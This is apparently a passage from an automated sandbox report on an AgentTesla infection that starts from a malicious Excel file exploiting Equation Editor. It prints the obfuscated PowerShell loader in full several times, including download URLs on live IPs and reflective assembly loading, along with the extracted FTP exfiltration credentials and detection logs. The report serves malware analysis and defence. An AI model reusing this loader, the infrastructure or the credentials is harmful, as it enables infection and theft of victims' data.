'+'oiLloadedAssembly.GetType(Ols'+'RunPE.HomeOl'+'s); oiLmethod = oiLtype.GetMethod(Ols'+'VAIOl'+'s).Invoke(oiLnull, [object[]] (Olstxt.4'+'446sab'+'bbbbbbewmadam/441.871.64.891//:ptthOls , Olsdesativ'+'adoOls , OlsdesativadoOls , Olsdesati'+'vadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scr'+'iptblock oiLlink '+'= Olshttp://91.92.2'+'54.194/imge/new-image_v.jpgOls; oiLwebClient = New-'+'Object System.Net.WebClient; try { oiLdownloadedData '+'= oiLw'+'ebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data '+'from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData'+' -ne oiLnu'+'ll) { oiLimageText = [System.Text.Encoding]::U'
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "INVOkE-EXpRessIon ( ('oiL'+'li'+'n'+'k = Olshttp'+'://91.92.254.194/imge/new-image'+'_v.jpgOls; oiLwebClient = New-Object'+' System.Net.WebClient; try { oiLdownloadedData = oi'+'LwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oiLnull) { oiLimageText = [Sy'+'stem.T'+'ex'+'t.Encoding]::UTF8.GetString'+'(oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLendIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendIn'+'dex -gt oiLstartIndex) { oiLstartInd'+'ex += oiLstartFlag.Length; oiLbase64Length = oiLendIn'+'dex - oiLstartInd'+'ex; oiLbase64Command = oiLimageText.Substri'+'ng(oiLstartIndex, oiLbase64Lengt'+'h); oiLcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiL'+'loadedAssembly = [System.Reflection.Assembly]::Load(oiLcomm'+'andBytes); oiLtype = oiLloadedAssembly.GetType(OlsRunPE.HomeOls); oiLmethod = oiLtype.GetMethod(OlsVAIOls).Invoke(oiLnull,'+' [object[]] (Olstxt.4446sabbbbbbbewmadam/441.871.64.8'+'91//:ptthOls , Olsdesativad'+'oOls , OlsdesativadoOls , OlsdesativadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scriptblock oiLlink = Olshttp://91.92.254.194/imge/new-image_v.jpgOls; oiLwebClient ='+' New-Object System.Net.WebClient; try { oi'+'LdownloadedData = oiLwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To down'+'load data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oi'+'Lnull) { oiLimageText = [System.T'+'ext.Encoding]::UTF8.GetString('+'oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLen'+'dIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendInde'+'x -gt oiLstartIndex) { oiLstartIndex += '+'oiLstartFlag.Length; oiLbase64Length = oiLendIndex - oiLstartIndex; oiLbase64Command ='+' oiLimageText.Substring(oiLstartIndex'+', oiLbase64Length); oi'+'LcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiLloadedAssembly = [System.Reflection.'+'Assembly]::Load(oiLcommandBytes); oiLtype = '+'oiLloadedAssembly.GetType(Ols'+'RunPE.HomeOl'+'s); oiLmethod = oiLtype.GetMethod(Ols'+'VAIOl'+'s).Invoke(oiLnull, [object[]] (Olstxt.4'+'446sab'+'bbbbbbewmadam/441.871.64.891//:ptthOls , Olsdesativ'+'adoOls , OlsdesativadoOls , Olsdesati'+'vadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scr'+'iptblock oiLlink '+'= Olshttp://91.92.2'+'54.194/imge/new-image_v.jpgOls; oiLwebClient = New-'+'Object System.Net.WebClient; try { oiLdownloadedData '+'= oiLw'+'ebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data '+'from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData'+' -ne oiLnu'+'ll) { oiLimageText = [System.Text.Encoding]::U'
                  Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 91.92.254.14, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 380, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49162
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\controlfiredatinloverforxlammfile.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\controlfiredatinloverforxlammfile.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1444, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\controlfiredatinloverforxlammfile.vbs" , ProcessId: 380, ProcessName: wscript.exe
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\controlfiredatinloverforxlammfile.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\controlfiredatinloverforxlammfile.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1444, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\controlfiredatinloverforxlammfile.vbs" , ProcessId: 380, ProcessName: wscript.exe
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 91.92.254.14, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 380, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49162
                  Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, QueryName: ip-api.com
                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "INVOkE-EXpRessIon ( ('oiL'+'li'+'n'+'k = Olshttp'+'://91.92.254.194/imge/new-image'+'_v.jpgOls; oiLwebClient = New-Object'+' System.Net.WebClient; try { oiLdownloadedData = oi'+'LwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oiLnull) { oiLimageText = [Sy'+'stem.T'+'ex'+'t.Encoding]::UTF8.GetString'+'(oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLendIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendIn'+'dex -gt oiLstartIndex) { oiLstartInd'+'ex += oiLstartFlag.Length; oiLbase64Length = oiLendIn'+'dex - oiLstartInd'+'ex; oiLbase64Command = oiLimageText.Substri'+'ng(oiLstartIndex, oiLbase64Lengt'+'h); oiLcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiL'+'loadedAssembly = [System.Reflection.Assembly]::Load(oiLcomm'+'andBytes); oiLtype = oiLloadedAssembly.GetType(OlsRunPE.HomeOls); oiLmethod = oiLtype.GetMethod(OlsVAIOls).Invoke(oiLnull,'+' [object[]] (Olstxt.4446sabbbbbbbewmadam/441.871.64.8'+'91//:ptthOls , Olsdesativad'+'oOls , OlsdesativadoOls , OlsdesativadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scriptblock oiLlink = Olshttp://91.92.254.194/imge/new-image_v.jpgOls; oiLwebClient ='+' New-Object System.Net.WebClient; try { oi'+'LdownloadedData = oiLwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To down'+'load data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oi'+'Lnull) { oiLimageText = [System.T'+'ext.Encoding]::UTF8.GetString('+'oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLen'+'dIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendInde'+'x -gt oiLstartIndex) { oiLstartIndex += '+'oiLstartFlag.Length; oiLbase64Length = oiLendIndex - oiLstartIndex; oiLbase64Command ='+' oiLimageText.Substring(oiLstartIndex'+', oiLbase64Length); oi'+'LcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiLloadedAssembly = [System.Reflection.'+'Assembly]::Load(oiLcommandBytes); oiLtype = '+'oiLloadedAssembly.GetType(Ols'+'RunPE.HomeOl'+'s); oiLmethod = oiLtype.GetMethod(Ols'+'VAIOl'+'s).Invoke(oiLnull, [object[]] (Olstxt.4'+'446sab'+'bbbbbbewmadam/441.871.64.891//:ptthOls , Olsdesativ'+'adoOls , OlsdesativadoOls , Olsdesati'+'vadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scr'+'iptblock oiLlink '+'= Olshttp://91.92.2'+'54.194/imge/new-image_v.jpgOls; oiLwebClient = New-'+'Object System.Net.WebClient; try { oiLdownloadedData '+'= oiLw'+'ebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data '+'from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData'+' -ne oiLnu'+'ll) { oiLimageText = [System.Text.Encoding]::U'
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\controlfiredatinloverforxlammfile.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\controlfiredatinloverforxlammfile.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1444, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\controlfiredatinloverforxlammfile.vbs" , ProcessId: 380, ProcessName: wscript.exe
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1444, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "INVOkE-EXpRessIon ( ('oiL'+'li'+'n'+'k = Olshttp'+'://91.92.254.194/imge/new-image'+'_v.jpgOls; oiLwebClient = New-Object'+' System.Net.WebClient; try { oiLdownloadedData = oi'+'LwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oiLnull) { oiLimageText = [Sy'+'stem.T'+'ex'+'t.Encoding]::UTF8.GetString'+'(oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLendIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendIn'+'dex -gt oiLstartIndex) { oiLstartInd'+'ex += oiLstartFlag.Length; oiLbase64Length = oiLendIn'+'dex - oiLstartInd'+'ex; oiLbase64Command = oiLimageText.Substri'+'ng(oiLstartIndex, oiLbase64Lengt'+'h); oiLcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiL'+'loadedAssembly = [System.Reflection.Assembly]::Load(oiLcomm'+'andBytes); oiLtype = oiLloadedAssembly.GetType(OlsRunPE.HomeOls); oiLmethod = oiLtype.GetMethod(OlsVAIOls).Invoke(oiLnull,'+' [object[]] (Olstxt.4446sabbbbbbbewmadam/441.871.64.8'+'91//:ptthOls , Olsdesativad'+'oOls , OlsdesativadoOls , OlsdesativadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scriptblock oiLlink = Olshttp://91.92.254.194/imge/new-image_v.jpgOls; oiLwebClient ='+' New-Object System.Net.WebClient; try { oi'+'LdownloadedData = oiLwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To down'+'load data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oi'+'Lnull) { oiLimageText = [System.T'+'ext.Encoding]::UTF8.GetString('+'oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLen'+'dIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendInde'+'x -gt oiLstartIndex) { oiLstartIndex += '+'oiLstartFlag.Length; oiLbase64Length = oiLendIndex - oiLstartIndex; oiLbase64Command ='+' oiLimageText.Substring(oiLstartIndex'+', oiLbase64Length); oi'+'LcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiLloadedAssembly = [System.Reflection.'+'Assembly]::Load(oiLcommandBytes); oiLtype = '+'oiLloadedAssembly.GetType(Ols'+'RunPE.HomeOl'+'s); oiLmethod = oiLtype.GetMethod(Ols'+'VAIOl'+'s).Invoke(oiLnull, [object[]] (Olstxt.4'+'446sab'+'bbbbbbewmadam/441.871.64.891//:ptthOls , Olsdesativ'+'adoOls , OlsdesativadoOls , Olsdesati'+'vadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scr'+'iptblock oiLlink '+'= Olshttp://91.92.2'+'54.194/imge/new-image_v.jpgOls; oiLwebClient = New-'+'Object System.Net.WebClient; try { oiLdownloadedData '+'= oiLw'+'ebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data '+'from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData'+' -ne oiLnu'+'ll) { oiLimageText = [System.Text.Encoding]::U'
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1904, TargetFilename: C:\Users\user\AppData\Local\Temp\adeol3mg.2hs.ps1
                  Timestamp:07/05/24-07:26:34.692518
                  SID:2018856
                  Source Port:80
                  Destination Port:49167
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/05/24-07:26:34.845194
                  SID:2047750
                  Source Port:80
                  Destination Port:49167
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/05/24-07:26:31.509491
                  SID:2047750
                  Source Port:80
                  Destination Port:49163
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/05/24-07:26:28.270439
                  SID:2020424
                  Source Port:80
                  Destination Port:49164
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/05/24-07:26:32.990839
                  SID:2020424
                  Source Port:80
                  Destination Port:49166
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/05/24-07:26:35.614548
                  SID:2020424
                  Source Port:80
                  Destination Port:49169
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/05/24-07:26:22.594196
                  SID:2049038
                  Source Port:80
                  Destination Port:49162
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/05/24-07:26:31.509491
                  SID:2018856
                  Source Port:80
                  Destination Port:49163
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/05/24-07:26:32.228154
                  SID:2049038
                  Source Port:80
                  Destination Port:49163
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/05/24-07:26:34.846991
                  SID:2049038
                  Source Port:80
                  Destination Port:49167
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: DHL ESTADO DE CUENTA - 7664557687757.xlam.xlsxAvira: detected
                  Source: http://91.92.254.194/imge/new-image_v.jpgAvira URL Cloud: Label: malware
                  Source: http://198.46.178.144/madamwebbbbbbbas6444.txtAvira URL Cloud: Label: malware
                  Source: http://198.46.178.144/controlfirebase65.txtAvira URL Cloud: Label: malware
                  Source: 8.2.AddInProcess32.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.fosna.net", "Username": "madamweb@fosna.net", "Password": "=A+N^@~c]~#I"}
                  Source: http://198.46.178.144/madamwebbbbbbbas6444.txtVirustotal: Detection: 12%Perma Link
                  Source: http://198.46.178.144/controlfirebase65.txtVirustotal: Detection: 17%Perma Link
                  Source: DHL ESTADO DE CUENTA - 7664557687757.xlam.xlsxReversingLabs: Detection: 68%
                  Source: DHL ESTADO DE CUENTA - 7664557687757.xlam.xlsxVirustotal: Detection: 52%Perma Link

                  Exploits

                  barindex
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 198.46.178.144 Port: 80Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: RunPE.pdb source: powershell.exe, 00000006.00000002.520915129.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.517243140.0000000002B6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.515833395.00000000001F0000.00000004.08000000.00040000.00000000.sdmp

                  Software Vulnerabilities

                  barindex
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_034A058C ExitProcess,2_2_034A058C
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_034A0496 LoadLibraryW,2_2_034A0496
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_034A0567 ShellExecuteW,ExitProcess,2_2_034A0567
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_034A0539 URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_034A0539
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_034A0552 ShellExecuteW,ExitProcess,2_2_034A0552
                  Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Source: global trafficDNS query: name: ip-api.com
                  Source: global trafficDNS query: name: ip-api.com
                  Source: global trafficDNS query: name: ip-api.com
                  Source: global trafficDNS query: name: ip-api.com
                  Source: global trafficDNS query: name: ip-api.com
                  Source: global trafficDNS query: name: ip-api.com
                  Source: global trafficDNS query: name: ip-api.com
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.46.178.144:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.254.14:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.144:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.95.112.1:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.144:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.95.112.1:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.46.178.144:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.95.112.1:80
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 198.46.178.144:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 208.95.112.1:80
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 198.46.178.144:80
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 208.95.112.1:80
                  Source: global trafficTCP traffic: 192.168.2.22:49178 -> 198.46.178.144:80
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 208.95.112.1:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.46.178.144:80
                  Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.46.178.144:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.46.178.144:80
                  Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.46.178.144:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.254.14:80
                  Source: global trafficTCP traffic: 91.92.254.14:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.254.14:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.254.14:80
                  Source: global trafficTCP traffic: 91.92.254.14:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.46.178.144:80
                  Source: global trafficTCP traffic: 91.92.254.14:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 91.92.254.14:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 91.92.254.14:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.254.14:80
                  Source: global trafficTCP traffic: 91.92.254.14:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 91.92.254.14:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.254.14:80
                  Source: global trafficTCP traffic: 91.92.254.14:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 91.92.254.14:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.254.14:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
